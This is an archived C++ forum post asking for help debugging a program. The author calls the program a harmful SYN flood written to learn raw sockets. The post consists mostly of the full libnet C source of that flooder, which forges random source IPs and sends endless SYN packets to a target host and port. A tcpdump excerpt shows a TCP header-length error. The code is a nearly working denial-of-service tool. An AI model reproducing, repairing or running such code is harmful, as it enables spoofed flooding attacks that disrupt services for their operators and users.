C++

Forum

 
tcp hdr length

tuverentetil (1)
Hello,
thats my first topic here i hope my problem is pretty simple and you'll be able to find solution. So thats my problem:

its tcpdump of eth card after i run my program (its harmful because its synflood but i use it to learn how the tcp raw socket works on linux):
./synflood 192.168.0.2 21

tcpdump port 21:

19:23:43.669095 IP (tos 0x10, ttl 106, id 49310, offset 0, flags [none], proto TCP (6), length 40) 252.5.85.76.10034 > 192.168.0.2.21: tcp 20 [bad hdr length 0 - too short, < 20]
(each packet gives same error)

and thats the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
 
#include <libnet.h>

#define FLOOD_DELAY 5000 // 5000 ms flood speed

/* gives IP in notation x.x.x.x */
char *print_ip(u_long *ip_addr_ptr) {
   return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}


int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("Usage:\n%s\t <host_dst> <port_dst>\n", argv[0]);
      exit(1);
   }

   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // host
   dest_port = (u_short) atoi(argv[2]); // port


   network = libnet_open_raw_sock(IPPROTO_RAW); 
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "superuser privileges required to create raw sockets.\n");

   libnet_init_packet(packet_size, &packet); // allocate packet memory
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "fail to allocate packet memory.\n");

   libnet_seed_prand(); // random generator seed

   printf("Flooding  SYN port: %d host: %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // (exit on CTRL-C)
   {
         libnet_build_ip(LIBNET_TCP_H,      // size of the packet sans IP header 
         IPTOS_LOWDELAY,                 // IP tos 
         libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 
         0,                              // frag stuff 
         libnet_get_prand(LIBNET_PR8),   // TTL (randomized) 
         IPPROTO_TCP,                    // transport protocol 
         libnet_get_prand(LIBNET_PRu32), // source IP (randomized) 
         dest_ip,                        // destination IP 
         NULL,                           // payload (none) 
         0,                              // payload length 
         packet);                        // packet header memory   
 
      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
        dest_port,                      
         libnet_get_prand(LIBNET_PRu32), 
         libnet_get_prand(LIBNET_PRu32), 
         TH_SYN,                         
         libnet_get_prand(LIBNET_PRu16), 
        0,                              
        NULL,                          
        0,                             
        packet + LIBNET_IP_H);          

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
        libnet_error(LIBNET_ERR_FATAL, "CRC fail\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
      if (byte_count < packet_size)
        libnet_error(LIBNET_ERR_WARNING, "Warning: Packet was not correct.  (%d z %d bajtów)", byte_count, packet_size);

      usleep(FLOOD_DELAY); //
   }

   libnet_destroy_packet(&packet); // free memory of packet

   if (libnet_close_raw_sock(network) == -1) // close 
      libnet_error(LIBNET_ERR_WARNING, "unable to close connection.");

   return 0;
}
Last edited on
Topic archived. No new replies allowed.